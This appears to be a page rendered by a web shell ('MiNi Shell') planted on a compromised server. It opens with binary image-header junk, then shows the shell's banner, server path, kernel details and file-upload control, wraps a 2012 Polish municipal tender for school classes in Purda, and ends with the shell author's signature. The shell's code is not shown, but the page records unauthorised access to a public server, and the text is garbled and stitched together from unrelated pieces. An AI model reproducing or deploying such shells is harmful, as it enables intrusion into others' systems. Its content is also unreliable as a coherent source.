JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120926/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120926/367414-N-2012.html

<p class="kh_header"><b>Purda: usługi edukacyjne obejmujące przeprowadzenie zajęć w ramach projektu Klub Młodych Omnibusów w ramach Priorytetu IX, Działanie 9.1, Poddziałanie 9.1.2 Programu Operacyjnego Kapitał Ludzki, realizowane w Szkołach Podstawowych Gminy Purda</b><br>
<b>Numer ogłoszenia: 367414 - 2012; data zamieszczenia: 26.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Purda , 11-030 Purda, woj. warmińsko-mazurskie, tel. 89 5122223, faks 89 5122280.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.purda.pl, www.bip.purda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługi edukacyjne obejmujące przeprowadzenie zajęć w ramach projektu Klub Młodych Omnibusów w ramach Priorytetu IX, Działanie 9.1, Poddziałanie 9.1.2 Programu Operacyjnego Kapitał Ludzki, realizowane w Szkołach Podstawowych Gminy Purda.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi edukacyjne, obejmujące przeprowadzenie zajęć w Szkołach Podstawowych prowadzonych przez Gminę Purda w ramach projektu Klub Młodych Omnibusów współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego. Wykonawca zobowiązany będzie świadczyć usługi edukacyjne według harmonogramów uzgodnionych i zatwierdzonych przez dyrekcje placówek. Prowadzący zajęcia ponosi pełną odpowiedzialność za: 
a.bezpieczeństwo uczniów w trakcie zajęć, 
b.jakość i terminowość prowadzonych zajęć, 
c.szkody wyrządzone przez swoje działania lub zaniechania podczas wykonywania przedmiotu umowy. 
Wykonawca zobowiązany jest:
1.przygotować program pracy:
a.w oparciu o wytyczne dyrekcji szkoły,
b.uwzględniający potrzeby uczniów w realizowanym zadaniu,
2.prowadzić wymaganą dokumentację dotyczącą realizowanych zajęć 
3.po wdrożeniu programu przedstawić w formie pisemnej osiągnięte efekty. 
Usługi będą realizowane w następujących specjalnościach (poniższe liczby godzin mogą ulec zmianie ze względu na możliwe zmiany w projekcie):

Część 1: 
Innowacyjne zajęcia z języka angielskiego Klub młodych filologó w Szkole Podstawowej im. Franciszka Barcza w Butrynach. Zajęcia mają być prowadzone metodą komunikatywną z wykorzystaniem dramy, programów multimedialnych oraz przyborów plastycznych. Zajęcia w 2 latach szkolnych będą trwały w sumie 240 godzin lekcyjnych (2 grupy po 60 godzin, w każdym roku szkolnym).

Część 2: 
Innowacyjne zajęcia z języka angielskiego Klub młodych filologó w Szkole Podstawowej w Klebarku Wielkim. Zajęcia mają być prowadzone metodą komunikatywną z wykorzystaniem dramy, programów multimedialnych oraz przyborów plastycznych. Zajęcia w 2 latach szkolnych będą trwały w sumie 120 godzin lekcyjnych (1 grupa po 60 godzin, w każdym roku szkolnym).

Część 3: 
Innowacyjne zajęcia z języka angielskiego Klub młodych filologó w Szkole Podstawowej im. Tadeusza Pezały w Purdzie. Zajęcia mają być prowadzone metodą komunikatywną z wykorzystaniem dramy, programów multimedialnych oraz przyborów plastycznych. Zajęcia w 2 latach szkolnych będą trwały w sumie 240 godzin lekcyjnych (2 grupy po 60 godzin, w każdym roku szkolnym).

Część 4: 
Innowacyjne zajęcia z języka angielskiego Klub młodych filologó w Szkole Podstawowej w Szczęsnem. Zajęcia mają być prowadzone metodą komunikatywną z wykorzystaniem dramy, programów multimedialnych oraz przyborów plastycznych. Zajęcia w 2 latach szkolnych będą trwały w sumie 240 godzin lekcyjnych (2 grupy po 60 godzin, w każdym roku szkolnym).

Część 5: 
Innowacyjne zajęcia z matematyki Kraina matematyki w Szkole Podstawowej im. Franciszka Barcza w Butrynach. Zajęcia mają być prowadzone z użyciem tablic interaktywnych i programów komputerowych, poprzez zabawę i pokazanie wykorzystania matematyki w życiu codziennym. Zajęcia w 2 latach szkolnych będą trwały w sumie 120 godzin lekcyjnych (2 grupy po 30 godzin, w każdym roku szkolnym).

Część 6: 
Innowacyjne zajęcia z matematyki Kraina matematyki w Szkole Podstawowej w Klebarku Wielkim. Zajęcia mają być prowadzone z użyciem tablic interaktywnych i programów komputerowych, poprzez zabawę i pokazanie wykorzystania matematyki w życiu codziennym. Zajęcia w 2 latach szkolnych będą trwały w sumie 60 godzin lekcyjnych (1 grupa po 30 godzin, w każdym roku szkolnym).

Część 7: 
Innowacyjne zajęcia z matematyki Kraina matematyki w Szkole Podstawowej im. Tadeusza Pezały w Purdzie. Zajęcia mają być prowadzone z użyciem tablic interaktywnych i programów komputerowych, poprzez zabawę i pokazanie wykorzystania matematyki w życiu codziennym. Zajęcia w 2 latach szkolnych będą trwały w sumie 120 godzin lekcyjnych (2 grupy po 30 godzin, w każdym roku szkolnym).

Część 8: 
Innowacyjne zajęcia z matematyki Kraina matematyki w Szkole Podstawowej w Szczęsnem. Zajęcia mają być prowadzone z użyciem tablic interaktywnych i programów komputerowych, poprzez zabawę i pokazanie wykorzystania matematyki w życiu codziennym. Zajęcia w 2 latach szkolnych będą trwały w sumie 120 godzin lekcyjnych (2 grupy po 30 godzin, w każdym roku szkolnym).

Część 9: 
Innowacyjne zajęcia z języka polskiego Zabawy z językiem polskim w Szkole Podstawowej im. Franciszka Barcza w Butrynach. Zajęcia mają być prowadzone z użyciem zestawów multimedialnych i programów komputerowych, rozwój pisania poprzez zabawę (komiksy, bajki, dziennikarstwo). Zajęcia w 2 latach szkolnych będą trwały w sumie 60 godzin lekcyjnych (1 grupa po 30 godzin, w każdym roku szkolnym).

Część 10: 
Innowacyjne zajęcia z języka polskiego Zabawy z językiem polskim w Szkole Podstawowej w Klebarku Wielkim. Zajęcia mają być prowadzone z użyciem zestawów multimedialnych i programów komputerowych, przygotowanie kampanii reklamowych. Zajęcia w 2 latach szkolnych będą trwały w sumie 60 godzin lekcyjnych (1 grupa po 30 godzin, w każdym roku szkolnym).

Część 11: 
Innowacyjne zajęcia z języka polskiego Zabawy z językiem polskim w Szkole Podstawowej im. Tadeusza Pezały w Purdzie. Zajęcia mają być prowadzone z użyciem zestawów multimedialnych i programów komputerowych, interaktywne zabawy i ćwiczenia ortograficzne. Zajęcia w 2 latach szkolnych będą trwały w sumie 120 godzin lekcyjnych (2 grupy po 30 godzin, w każdym roku szkolnym).

Część 12: 
Innowacyjne zajęcia z języka polskiego Zabawy z językiem polskim w Szkole Podstawowej w Szczęsnem. Zajęcia mają być prowadzone z użyciem zestawów multimedialnych i programów komputerowych, interaktywne zabawy i ćwiczenia ortograficzne. Zajęcia w 2 latach szkolnych będą trwały w sumie 60 godzin lekcyjnych (1 grupa po 30 godzin, w każdym roku szkolnym).

Część 13: 
Innowacyjne zajęcia z przyrody Na tropach sekretów przyrody w Szkole Podstawowej im. Franciszka Barcza w Butrynach. Zajęcia terenowo-eksperymentalne. Zajęcia mają być prowadzone metodami aktywnymi - uczniowie będą przeprowadzać eksperymenty, doświadczenia, prowadzić hodowle i obserwacje oraz korzystać ze sprzętu interaktywnego. Częścią zajęć będą wycieczki. Zajęcia w 2 latach szkolnych będą trwały w sumie 60 godzin lekcyjnych (1 grupa po 30 godzin, w każdym roku szkolnym).

Część 14: 
Innowacyjne zajęcia z przyrody Na tropach sekretów przyrody w Szkole Podstawowej w Szczęsnem. Zajęcia terenowo-eksperymentalne. Zajęcia mają być prowadzone metodami aktywnymi - uczniowie będą przeprowadzać eksperymenty, doświadczenia, prowadzić hodowle i obserwacje oraz korzystać ze sprzętu interaktywnego. Częścią zajęć będą wycieczki. Zajęcia w 2 latach szkolnych będą trwały w sumie 60 godzin lekcyjnych (1 grupa po 30 godzin, w każdym roku szkolnym).

Część 15: 
Innowacyjne zajęcia z historii Żywe lekcje historii w Szkole Podstawowej im. Franciszka Barcza w Butrynach. Zajęcia będą realizowane przez dramę i inscenizację wybranych wydarzeń, projekty grupowe (wykonanie modeli plastycznych). Zajęcia w 2 latach szkolnych będą trwały w sumie 60 godzin lekcyjnych (1 grupa po 30 godzin, w każdym roku szkolnym).

Część 16: 
Innowacyjne zajęcia teatralne Tworzymy baśnie w Szkole Podstawowej w Szczęsnem. Zajęcia będą realizowane poprzez inscenizacje, wycieczki, przygotowanie rekwizytów i warsztaty prowadzą do poznania teatru. Planuje się wspólne warsztaty z animatorem teatru lalkowego / aktorem. Zajęcia w 2 latach szkolnych będą trwały w sumie 60 godzin lekcyjnych (1 grupa po 30 godzin, w każdym roku szkolnym).

Część 17:
Zajęcia z równości szans kobiet i mężczyzn w: Szkole Podstawowej im. Franciszka Barcza w Butrynach, Szkole Podstawowej w Klebarku Wielkim, Szkole Podstawowej im. Tadeusza Pezały w Purdzie, Szkole Podstawowej w Szczęsnem. Warsztaty na temat stereotypów postrzegania płci, norm zachowań i ról kobiet i mężczyzn. Forma pogadanek, dyskusji, warsztatów i scenek sytuacyjnych. Zajęcia w 2 latach szkolnych będą trwały w sumie 32 godzin lekcyjnych (8 grup po 2 godziny, w każdym roku szkolnym - w każdej szkole po 2 grupy rocznie)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>3.1.Zamawiający informuje, że dopuszcza możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych, w przypadku zmian zasad projektu wprowadzonych przez Instytucje Zarządzającą Programem Operacyjnym Kapitał Ludzki.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 17.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.1.1.Zamawiający uzna, że Wykonawca spełnia warunek dotyczący posiadania uprawnienia do wykonywania określonej działalności lub czynności, jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia określone w pkt. 6.1 oraz przedstawi dokumenty określone w pkt.6.3. SIWZ      
5.1.1.Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego spełnia-nie spełnia. Z treści dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnia. Zamawiający wzywa wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów, o których mowa w punkcie VI specyfikacji, lub którzy złożyli dokumenty i oświadczenia, wskazane w punkcie VI specyfikacji, zawierające błędy, do ich uzupełniania w wyznaczonym terminie, chyba że mimo ich uzupełniania oferta podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Oświadczenia lub dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu, nie później niż w dniu składania ofert.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący posiadania wiedzy i doświadczenia, jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia i przedstawi dokumenty określone w pkt. 6.3 SIWZ
5.1.1.Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego spełnia-nie spełnia. Z treści dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnia. Zamawiający wzywa wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów, o których mowa w punkcie VI specyfikacji, lub którzy złożyli dokumenty i oświadczenia, wskazane w punkcie VI specyfikacji, zawierające błędy, do ich uzupełniania w wyznaczonym terminie, chyba że mimo ich uzupełniania oferta podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Oświadczenia lub dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu, nie później niż w dniu składania ofert.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia oraz przedstawi dokumenty określone w pkt. 6.3. SIWZ
5.1.1.Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego -spełnia-nie spełnia. Z treści dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnia. Zamawiający wzywa wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów, o których mowa w punkcie VI specyfikacji, lub którzy złożyli dokumenty i oświadczenia, wskazane w punkcie VI specyfikacji, zawierające błędy, do ich uzupełniania w wyznaczonym terminie, chyba że mimo ich uzupełniania oferta podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Oświadczenia lub dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu, nie później niż w dniu składania ofert.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia oraz przedstawi dokumenty określone w pkt. 6.3. SIWZ
5.1.1.Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego spełnia-nie spełnia. Z treści dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnia. Zamawiający wzywa wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów, o których mowa w punkcie VI specyfikacji, lub którzy złożyli dokumenty i oświadczenia, wskazane w punkcie VI specyfikacji, zawierające błędy, do ich uzupełniania w wyznaczonym terminie, chyba że mimo ich uzupełniania oferta podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Oświadczenia lub dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu, nie później niż w dniu składania ofert.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący sytuacji ekonomicznej i finansowej, jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia. 
5.1.1.Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego  spełnia-nie spełnia. Z treści dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnia. Zamawiający wzywa wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów, o których mowa w punkcie VI specyfikacji, lub którzy złożyli dokumenty i oświadczenia, wskazane w punkcie VI specyfikacji, zawierające błędy, do ich uzupełniania w wyznaczonym terminie, chyba że mimo ich uzupełniania oferta podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Oświadczenia lub dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu, nie później niż w dniu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>6.1W celu potwierdzenia niepodlegania wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759 z późniejszymi zmianami) wykonawcy mają dostarczyć:
1.oświadczenie o niepodleganiu wykluczeniu na postawie art. 24 ust. 1 i 2 Pzp (Załącznik nr 2 do niniejszej specyfikacji).
2.aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
6.2W celu potwierdzenia sytuacji ekonomicznej i finansowej Wykonawcy mają dostarczyć oświadczenie o spełnianiu warunków postępowania, (Załącznik nr 2 do niniejszej specyfikacji).
6.3W celu wykazania spełniania przez wykonawcę warunków dotyczących:
1.posiadania uprawnienia do wykonywania określonej działalności lub czynności, 
2.posiadania wiedzy i doświadczenia, 
3.dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonywania zamówienia, 
Wykonawcy mają dostarczyć:
1.oświadczenie o spełnianiu warunków postępowania, (Załącznik nr 2 do niniejszej specyfikacji),
2.Część 1-16, 21 dokumenty osoby wykonującej usługę potwierdzające:
a.wykształcenie wyższe z przygotowaniem pedagogicznym, 
b.stopień awansu zawodowego nauczyciela kontraktowego, 
3.Część 17-20 dokumenty osoby wykonującej usługę potwierdzające:
a.wykształcenie wyższe na kierunkach pedagogika lub psychologia, 
b.stopień awansu zawodowego nauczyciela dyplomowanego, 
5.1.Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, stosuje się do przepisy § 4 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.purda.pl, www.bip.purda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Purdzie, 11-030 Purda 19.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.10.2012 godzina 10:00, miejsce: Sekretariat Urzedu Gminy w Purdzie, 11-030 Purda 19.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com